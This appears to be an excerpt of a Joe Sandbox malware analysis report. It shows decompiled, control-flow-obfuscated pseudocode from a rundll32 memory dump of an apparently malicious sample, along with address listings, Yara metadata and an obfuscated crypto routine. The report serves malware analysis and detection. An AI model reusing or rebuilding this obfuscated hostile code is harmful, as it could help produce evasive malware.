								_t976 = E002C75FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
								E002CA8B0(_v268, _v276, _v212);
								_t988 =  &(_t988[0xe]);
								__eflags = _t976;
								if(_t976 == 0) {
									_t977 = 0x51daea9;
								} else {
									_push(_v96);
									_push(_v264);
									_push(_v256);
									_v60 = 1;
									_push( &_v60);
									_push(_v92);
									_t948 = 4;
									E002C9670(_t976, _t948);
									_t988 =  &(_t988[5]);
									__eflags = _t981;
									if(_t981 != 0) {
										E002D408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
										_t732 =  &_v60;
										 *_t732 = _v60 | _v136;
										__eflags =  *_t732;
										E002C9670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
										_t988 =  &(_t988[0xb]);
									}
									_t977 = 0xbee37f5;
								}
								L11:
								_t868 = _v276;
								goto L1;
							}
							if(_t977 == 0x2602436) {
								_t977 = 0x506ebc3;
								continue;
							}
							if(_t977 == 0x329d839) {
								_t977 = 0x2602436;
								continue;
							}
							if(_t977 == 0x4bb42fe) {
								_t823 = E002C88C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
								_t868 = _v276;
								_t988 =  &(_t988[0xd]);
								__eflags = _t823;
								_v184 = _t823;
								_t939 = 0x68a9e90;
								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
								continue;
							}
							if(_t977 == 0x506ebc3) {
								_push(_t868);
								_push(_v72);
								_push(_v160);
								_push(_v28);
								_push(_v152);
								_t858 = E002DDAC6(_v112, _v180);
								_t986 = _t858;
								__eflags = _t858;
								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
								E002D8519(_v88, _v48, 0);
								_t988 = _t988 - 0xc + 0x24;
								L37:
								_t868 = _v276;
								_t939 = 0x68a9e90;
								L38:
								__eflags = _t977 - 0xdf8c541;
								if(_t977 == 0xdf8c541) {
									L41:
									return _t862;
								}
								_t823 = _v184;
								continue;
							}
							if(_t977 != 0x51daea9) {
								goto L38;
							}
							E002C2B62(_v168, _t823, _v156, _v140);
							_t977 = 0x9a35046;
							goto L11;
						}
						__eflags = _t977 - 0x81a6b17;
						if(_t977 == 0x81a6b17) {
							E002C2B62(_v192, _t976, _v200, _v284);
							_t977 = 0x51daea9;
							goto L37;
						}
						__eflags = _t977 - 0x9a35046;
						if(_t977 == 0x9a35046) {
							E002C2B62(_v280, _t986, _v176, _v288);
							goto L41;
						}
						__eflags = _t977 - 0xb70b8d2;
						if(_t977 == 0xb70b8d2) {
							__eflags = E002DA2E8(_t976, _a4);
							_t977 = 0x81a6b17;
							_t829 = 1;
							_t862 =  !=  ? _t829 : _t862;
							goto L11;
						}
						__eflags = _t977 - 0xba06d79;
						if(__eflags == 0) {
							__eflags = E002E09B5(_t976, _v120, __eflags) - _v36;
							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
							goto L11;
						}
						__eflags = _t977 - 0xbee37f5;
						if(_t977 != 0xbee37f5) {
							goto L38;
						}
						_t832 = _v8;
						_t888 =  *_t832;
						__eflags = _t888;
						if(_t888 == 0) {
							_t833 = 0;
							__eflags = 0;
						} else {
							_t833 = _t832[1];
						}
						E002C2AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
						_t988 =  &(_t988[7]);
						asm("sbb esi, esi");
						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
						goto L11;
					}
				}
			}

















































































































                                                                                                                                    0x002de39f
                                                                                                                                    0x002de3a8
                                                                                                                                    0x002de3af
                                                                                                                                    0x002de3b6
                                                                                                                                    0x002de3bd
                                                                                                                                    0x002de3c4
                                                                                                                                    0x002de3cb
                                                                                                                                    0x002de3d2
                                                                                                                                    0x002de3d9
                                                                                                                                    0x002de3e0
                                                                                                                                    0x002de3e7
                                                                                                                                    0x002de3ee
                                                                                                                                    0x002de3f5
                                                                                                                                    0x002de3fc
                                                                                                                                    0x002de400
                                                                                                                                    0x002de401
                                                                                                                                    0x002de406
                                                                                                                                    0x002de40e
                                                                                                                                    0x002de411
                                                                                                                                    0x002de41b
                                                                                                                                    0x002de422
                                                                                                                                    0x002de42a
                                                                                                                                    0x002de42c
                                                                                                                                    0x002de437
                                                                                                                                    0x002de445
                                                                                                                                    0x002de44a
                                                                                                                                    0x002de453
                                                                                                                                    0x002de45e
                                                                                                                                    0x002de469
                                                                                                                                    0x002de474
                                                                                                                                    0x002de47b
                                                                                                                                    0x002de486
                                                                                                                                    0x002de491
                                                                                                                                    0x002de4a4
                                                                                                                                    0x002de4a5
                                                                                                                                    0x002de4a9
                                                                                                                                    0x002de4b0
                                                                                                                                    0x002de4bb
                                                                                                                                    0x002de4c3
                                                                                                                                    0x002de4c8
                                                                                                                                    0x002de4d2
                                                                                                                                    0x002de4d6
                                                                                                                                    0x002de4de
                                                                                                                                    0x002de4e9
                                                                                                                                    0x002de4f4
                                                                                                                                    0x002de4ff
                                                                                                                                    0x002de50a
                                                                                                                                    0x002de515
                                                                                                                                    0x002de520
                                                                                                                                    0x002de52b
                                                                                                                                    0x002de536
                                                                                                                                    0x002de54a
                                                                                                                                    0x002de551
                                                                                                                                    0x002de55c
                                                                                                                                    0x002de564
                                                                                                                                    0x002de569
                                                                                                                                    0x002de576
                                                                                                                                    0x002de57a
                                                                                                                                    0x002de582
                                                                                                                                    0x002de58d
                                                                                                                                    0x002de5a0
                                                                                                                                    0x002de5a7
                                                                                                                                    0x002de5b2
                                                                                                                                    0x002de5bc
                                                                                                                                    0x002de5c4
                                                                                                                                    0x002de5cf
                                                                                                                                    0x002de5d4
                                                                                                                                    0x002de5d8
                                                                                                                                    0x002de5e0
                                                                                                                                    0x002de5e8
                                                                                                                                    0x002de5ed
                                                                                                                                    0x002de5f5
                                                                                                                                    0x002de5fa
                                                                                                                                    0x002de602
                                                                                                                                    0x002de60d
                                                                                                                                    0x002de618
                                                                                                                                    0x002de623
                                                                                                                                    0x002de632
                                                                                                                                    0x002de635
                                                                                                                                    0x002de636
                                                                                                                                    0x002de63a
                                                                                                                                    0x002de63f
                                                                                                                                    0x002de647
                                                                                                                                    0x002de64f
                                                                                                                                    0x002de65a
                                                                                                                                    0x002de665
                                                                                                                                    0x002de670
                                                                                                                                    0x002de680
                                                                                                                                    0x002de684
                                                                                                                                    0x002de690
                                                                                                                                    0x002de694
                                                                                                                                    0x002de69c
                                                                                                                                    0x002de6b2
                                                                                                                                    0x002de6b9
                                                                                                                                    0x002de6c4
                                                                                                                                    0x002de6cf
                                                                                                                                    0x002de6e1
                                                                                                                                    0x002de6e6
                                                                                                                                    0x002de6ed
                                                                                                                                    0x002de6f8
                                                                                                                                    0x002de707
                                                                                                                                    0x002de708
                                                                                                                                    0x002de70c
                                                                                                                                    0x002de714
                                                                                                                                    0x002de724
                                                                                                                                    0x002de728
                                                                                                                                    0x002de730
                                                                                                                                    0x002de73e
                                                                                                                                    0x002de742
                                                                                                                                    0x002de74a
                                                                                                                                    0x002de752
                                                                                                                                    0x002de75a
                                                                                                                                    0x002de762
                                                                                                                                    0x002de767
                                                                                                                                    0x002de76f
                                                                                                                                    0x002de777
                                                                                                                                    0x002de77f
                                                                                                                                    0x002de787
                                                                                                                                    0x002de791
                                                                                                                                    0x002de796
                                                                                                                                    0x002de79e
                                                                                                                                    0x002de7ac
                                                                                                                                    0x002de7b1
                                                                                                                                    0x002de7b7
                                                                                                                                    0x002de7bf
                                                                                                                                    0x002de7cb
                                                                                                                                    0x002de7d0
                                                                                                                                    0x002de7d6
                                                                                                                                    0x002de7de
                                                                                                                                    0x002de7ea
                                                                                                                                    0x002de7ef
                                                                                                                                    0x002de7f5
                                                                                                                                    0x002de7fd
                                                                                                                                    0x002de805
                                                                                                                                    0x002de80d
                                                                                                                                    0x002de815
                                                                                                                                    0x002de821
                                                                                                                                    0x002de826
                                                                                                                                    0x002de82c
                                                                                                                                    0x002de834
                                                                                                                                    0x002de83c
                                                                                                                                    0x002de841
                                                                                                                                    0x002de846
                                                                                                                                    0x002de84e
                                                                                                                                    0x002de859
                                                                                                                                    0x002de861
                                                                                                                                    0x002de869
                                                                                                                                    0x002de874
                                                                                                                                    0x002de87f
                                                                                                                                    0x002de88a
                                                                                                                                    0x002de895
                                                                                                                                    0x002de8a0
                                                                                                                                    0x002de8ab
                                                                                                                                    0x002de8b6
                                                                                                                                    0x002de8be
                                                                                                                                    0x002de8d0
                                                                                                                                    0x002de8d5
                                                                                                                                    0x002de8de
                                                                                                                                    0x002de8e9
                                                                                                                                    0x002de8f4
                                                                                                                                    0x002de8ff
                                                                                                                                    0x002de90a
                                                                                                                                    0x002de915
                                                                                                                                    0x002de920
                                                                                                                                    0x002de932
                                                                                                                                    0x002de935
                                                                                                                                    0x002de93c
                                                                                                                                    0x002de947
                                                                                                                                    0x002de952
                                                                                                                                    0x002de95d
                                                                                                                                    0x002de968
                                                                                                                                    0x002de973
                                                                                                                                    0x002de97e
                                                                                                                                    0x002de989
                                                                                                                                    0x002de99f
                                                                                                                                    0x002de9a4
                                                                                                                                    0x002de9ab
                                                                                                                                    0x002de9b6
                                                                                                                                    0x002de9ca
                                                                                                                                    0x002de9cf
                                                                                                                                    0x002de9d6
                                                                                                                                    0x002de9de
                                                                                                                                    0x002de9e9
                                                                                                                                    0x002de9f7
                                                                                                                                    0x002de9fc
                                                                                                                                    0x002dea00
                                                                                                                                    0x002dea05
                                                                                                                                    0x002dea0a
                                                                                                                                    0x002dea12
                                                                                                                                    0x002dea1d
                                                                                                                                    0x002dea28
                                                                                                                                    0x002dea33
                                                                                                                                    0x002dea48
                                                                                                                                    0x002dea49
                                                                                                                                    0x002dea50
                                                                                                                                    0x002dea5b
                                                                                                                                    0x002dea63
                                                                                                                                    0x002dea6b
                                                                                                                                    0x002dea73
                                                                                                                                    0x002dea7b
                                                                                                                                    0x002dea83
                                                                                                                                    0x002dea90
                                                                                                                                    0x002dea94
                                                                                                                                    0x002dea9c
                                                                                                                                    0x002deaa4
                                                                                                                                    0x002deaac
                                                                                                                                    0x002deabf
                                                                                                                                    0x002deac6
                                                                                                                                    0x002deace
                                                                                                                                    0x002dead9
                                                                                                                                    0x002deae4
                                                                                                                                    0x002deaef
                                                                                                                                    0x002deaf7
                                                                                                                                    0x002deb02
                                                                                                                                    0x002deb0d
                                                                                                                                    0x002deb15
                                                                                                                                    0x002deb1d
                                                                                                                                    0x002deb28
                                                                                                                                    0x002deb30
                                                                                                                                    0x002deb3d
                                                                                                                                    0x002deb41
                                                                                                                                    0x002deb49
                                                                                                                                    0x002deb51
                                                                                                                                    0x002deb67
                                                                                                                                    0x002deb6e
                                                                                                                                    0x002deb79
                                                                                                                                    0x002deb84
                                                                                                                                    0x002deb8c
                                                                                                                                    0x002deb97
                                                                                                                                    0x002debab
                                                                                                                                    0x002debb2
                                                                                                                                    0x002debbd
                                                                                                                                    0x002debc8
                                                                                                                                    0x002debd2
                                                                                                                                    0x002debda
                                                                                                                                    0x002debe5
                                                                                                                                    0x002debf4
                                                                                                                                    0x002debf5
                                                                                                                                    0x002debf9
                                                                                                                                    0x002debfe
                                                                                                                                    0x002dec06
                                                                                                                                    0x002dec0e
                                                                                                                                    0x002dec16
                                                                                                                                    0x002dec23
                                                                                                                                    0x002dec27
                                                                                                                                    0x002dec2f
                                                                                                                                    0x002dec37
                                                                                                                                    0x002dec3f
                                                                                                                                    0x002dec47
                                                                                                                                    0x002dec4f
                                                                                                                                    0x002dec54
                                                                                                                                    0x002dec5c
                                                                                                                                    0x002dec64
                                                                                                                                    0x002dec69
                                                                                                                                    0x002dec6e
                                                                                                                                    0x002dec73
                                                                                                                                    0x002dec7b
                                                                                                                                    0x002dec86
                                                                                                                                    0x002dec91
                                                                                                                                    0x002dec9c
                                                                                                                                    0x002deca4
                                                                                                                                    0x002decb1
                                                                                                                                    0x002decba
                                                                                                                                    0x002decbe
                                                                                                                                    0x002decc6
                                                                                                                                    0x002decd1
                                                                                                                                    0x002decdc
                                                                                                                                    0x002dece7
                                                                                                                                    0x002decf2
                                                                                                                                    0x002decfa
                                                                                                                                    0x002ded05
                                                                                                                                    0x002ded10
                                                                                                                                    0x002ded1d
                                                                                                                                    0x002ded21
                                                                                                                                    0x002ded29
                                                                                                                                    0x002ded2e
                                                                                                                                    0x002ded36
                                                                                                                                    0x002ded41
                                                                                                                                    0x002ded4c
                                                                                                                                    0x002ded57
                                                                                                                                    0x002ded5f
                                                                                                                                    0x002ded67
                                                                                                                                    0x002ded6f
                                                                                                                                    0x002ded77
                                                                                                                                    0x002ded7f
                                                                                                                                    0x002ded87
                                                                                                                                    0x002ded8c
                                                                                                                                    0x002ded94
                                                                                                                                    0x002ded9c
                                                                                                                                    0x002deda4
                                                                                                                                    0x002dedac
                                                                                                                                    0x002dedb4
                                                                                                                                    0x002dedb9
                                                                                                                                    0x002dedc1
                                                                                                                                    0x002dedc9
                                                                                                                                    0x002dedd4
                                                                                                                                    0x002deddf
                                                                                                                                    0x002dedea
                                                                                                                                    0x002dedfe
                                                                                                                                    0x002dee05
                                                                                                                                    0x002dee10
                                                                                                                                    0x002dee1b
                                                                                                                                    0x002dee26
                                                                                                                                    0x002dee31
                                                                                                                                    0x002dee3c
                                                                                                                                    0x002dee49
                                                                                                                                    0x002dee54
                                                                                                                                    0x002dee5f
                                                                                                                                    0x002dee67
                                                                                                                                    0x002dee75
                                                                                                                                    0x002dee7a
                                                                                                                                    0x002dee80
                                                                                                                                    0x002dee88
                                                                                                                                    0x002dee90
                                                                                                                                    0x002dee98
                                                                                                                                    0x002dee9d
                                                                                                                                    0x002deea5
                                                                                                                                    0x002deead
                                                                                                                                    0x002deeb5
                                                                                                                                    0x002deebd
                                                                                                                                    0x002deec6
                                                                                                                                    0x002deecb
                                                                                                                                    0x002deed1
                                                                                                                                    0x002deed9
                                                                                                                                    0x002deee1
                                                                                                                                    0x002deee9
                                                                                                                                    0x002deef1
                                                                                                                                    0x002deef9
                                                                                                                                    0x002def01
                                                                                                                                    0x002def0c
                                                                                                                                    0x002def17
                                                                                                                                    0x002def22
                                                                                                                                    0x002def2d
                                                                                                                                    0x002def38
                                                                                                                                    0x002def43
                                                                                                                                    0x002def55
                                                                                                                                    0x002def5a
                                                                                                                                    0x002def6a
                                                                                                                                    0x002def6d
                                                                                                                                    0x002def74
                                                                                                                                    0x002def7f
                                                                                                                                    0x002def8a
                                                                                                                                    0x002def92
                                                                                                                                    0x002def9d
                                                                                                                                    0x002defa8
                                                                                                                                    0x002defb0
                                                                                                                                    0x002defb5
                                                                                                                                    0x002defbd
                                                                                                                                    0x002defc5
                                                                                                                                    0x002defcd
                                                                                                                                    0x002defd8
                                                                                                                                    0x002defe0
                                                                                                                                    0x002defeb
                                                                                                                                    0x002deff3
                                                                                                                                    0x002deffe
                                                                                                                                    0x002df006
                                                                                                                                    0x002df00e
                                                                                                                                    0x002df016
                                                                                                                                    0x002df01d
                                                                                                                                    0x002df024
                                                                                                                                    0x002df024
                                                                                                                                    0x002df024
                                                                                                                                    0x002df029
                                                                                                                                    0x002df029
                                                                                                                                    0x002df02d
                                                                                                                                    0x002df02d
                                                                                                                                    0x002df02d
                                                                                                                                    0x002df02f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002df035
                                                                                                                                    0x002df17e
                                                                                                                                    0x002df181
                                                                                                                                    0x002df183
                                                                                                                                    0x002df18f
                                                                                                                                    0x002df1a4
                                                                                                                                    0x002df1a6
                                                                                                                                    0x002df1a6
                                                                                                                                    0x002df1e0
                                                                                                                                    0x002df1e7
                                                                                                                                    0x002df1e7
                                                                                                                                    0x002df1e9
                                                                                                                                    0x002df1eb
                                                                                                                                    0x002df1eb
                                                                                                                                    0x002df1f0
                                                                                                                                    0x002df237
                                                                                                                                    0x002df23d
                                                                                                                                    0x002df242
                                                                                                                                    0x002df245
                                                                                                                                    0x002df247
                                                                                                                                    0x002df2ff
                                                                                                                                    0x002df24d
                                                                                                                                    0x002df24d
                                                                                                                                    0x002df258
                                                                                                                                    0x002df25d
                                                                                                                                    0x002df261
                                                                                                                                    0x002df26f
                                                                                                                                    0x002df270
                                                                                                                                    0x002df279
                                                                                                                                    0x002df27a
                                                                                                                                    0x002df27f
                                                                                                                                    0x002df282
                                                                                                                                    0x002df284
                                                                                                                                    0x002df2b3
                                                                                                                                    0x002df2c8
                                                                                                                                    0x002df2c8
                                                                                                                                    0x002df2c8
                                                                                                                                    0x002df2ed
                                                                                                                                    0x002df2f2
                                                                                                                                    0x002df2f2
                                                                                                                                    0x002df2f5
                                                                                                                                    0x002df2f5
                                                                                                                                    0x002df096
                                                                                                                                    0x002df096
                                                                                                                                    0x00000000
                                                                                                                                    0x002df096
                                                                                                                                    0x002df041
                                                                                                                                    0x002df16d
                                                                                                                                    0x00000000
                                                                                                                                    0x002df16d
                                                                                                                                    0x002df04d
                                                                                                                                    0x002df163
                                                                                                                                    0x00000000
                                                                                                                                    0x002df163
                                                                                                                                    0x002df059
                                                                                                                                    0x002df13f
                                                                                                                                    0x002df144
                                                                                                                                    0x002df148
                                                                                                                                    0x002df14b
                                                                                                                                    0x002df14d
                                                                                                                                    0x002df156
                                                                                                                                    0x002df15b
                                                                                                                                    0x00000000
                                                                                                                                    0x002df15b
                                                                                                                                    0x002df065
                                                                                                                                    0x002df09c
                                                                                                                                    0x002df09d
                                                                                                                                    0x002df0a4
                                                                                                                                    0x002df0ab
                                                                                                                                    0x002df0b5
                                                                                                                                    0x002df0ca
                                                                                                                                    0x002df0d6
                                                                                                                                    0x002df0df
                                                                                                                                    0x002df0ed
                                                                                                                                    0x002df0f0
                                                                                                                                    0x002df0f5
                                                                                                                                    0x002df3fa
                                                                                                                                    0x002df3fa
                                                                                                                                    0x002df3fe
                                                                                                                                    0x002df403
                                                                                                                                    0x002df403
                                                                                                                                    0x002df409
                                                                                                                                    0x002df42b
                                                                                                                                    0x002df434
                                                                                                                                    0x002df434
                                                                                                                                    0x002df029
                                                                                                                                    0x00000000
                                                                                                                                    0x002df029
                                                                                                                                    0x002df06d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002df08a
                                                                                                                                    0x002df091
                                                                                                                                    0x00000000
                                                                                                                                    0x002df091
                                                                                                                                    0x002df309
                                                                                                                                    0x002df30f
                                                                                                                                    0x002df3ee
                                                                                                                                    0x002df3f5
                                                                                                                                    0x00000000
                                                                                                                                    0x002df3f5
                                                                                                                                    0x002df315
                                                                                                                                    0x002df31b
                                                                                                                                    0x002df421
                                                                                                                                    0x00000000
                                                                                                                                    0x002df427
                                                                                                                                    0x002df326
                                                                                                                                    0x002df328
                                                                                                                                    0x002df3ce
                                                                                                                                    0x002df3d0
                                                                                                                                    0x002df3d7
                                                                                                                                    0x002df3d8
                                                                                                                                    0x00000000
                                                                                                                                    0x002df3d8
                                                                                                                                    0x002df32e
                                                                                                                                    0x002df334
                                                                                                                                    0x002df3b1
                                                                                                                                    0x002df3b8
                                                                                                                                    0x00000000
                                                                                                                                    0x002df3b8
                                                                                                                                    0x002df336
                                                                                                                                    0x002df33c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002df342
                                                                                                                                    0x002df349
                                                                                                                                    0x002df34b
                                                                                                                                    0x002df34d
                                                                                                                                    0x002df354
                                                                                                                                    0x002df354
                                                                                                                                    0x002df34f
                                                                                                                                    0x002df34f
                                                                                                                                    0x002df34f
                                                                                                                                    0x002df37a
                                                                                                                                    0x002df37f
                                                                                                                                    0x002df384
                                                                                                                                    0x002df38c
                                                                                                                                    0x00000000
                                                                                                                                    0x002df38c
                                                                                                                                    0x002df029

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                                    • API String ID: 0-3417817227
                                                                                                                                    • Opcode ID: aaf58db1450ab86f8ac7691c79affbc9a373a67e4cff106889725d41b48b728d
                                                                                                                                    • Instruction ID: 028fd8b269b75bca2b78e74e208e9cd222402d31168e1f801fc022e3eef73469
                                                                                                                                    • Opcode Fuzzy Hash: aaf58db1450ab86f8ac7691c79affbc9a373a67e4cff106889725d41b48b728d
                                                                                                                                    • Instruction Fuzzy Hash: 8E820071508381CFD378CF25C54AA8BBBE1BBD4718F108A2DE5DA96260D7B48959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CBB7E Relevance: 23.1, Strings: 18, Instructions: 637COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CBB7E(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
				_v180 = _v180 ^ 0x0008a356;
				_v340 = 0xb04f06;
				_v340 = _v340 | 0x19ae51aa;
				_v340 = _v340 + 0xffff0ab2;
				_v340 = _v340 >> 7;
				_v340 = _v340 ^ 0x003d7bf7;
				_v252 = 0x779412;
				_t741 = 0x28;
				_v252 = _v252 / _t741;
				_v252 = _v252 | 0x065d8c29;
				_v252 = _v252 ^ 0x0653787d;
				_v140 = 0x2cf99d;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x7ccdbf9f;
				_v300 = 0xa5c7e2;
				_v300 = _v300 ^ 0xf64f2b87;
				_v300 = _v300 | 0xd6032566;
